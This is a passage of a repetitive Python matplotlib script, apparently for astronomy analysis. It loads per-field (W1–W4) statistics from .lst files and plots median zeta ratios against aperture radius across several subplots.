% (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(4,5,11)\nrangemax=2\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,11)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{z}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 9\n\ncols=19\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(4,5,12)\nrangemax=3\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,12)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{M}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 10\n\ncols=21\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(4,5,13)\nrangemax=6\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,13)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{M^2}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 11\n\ncols=23\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 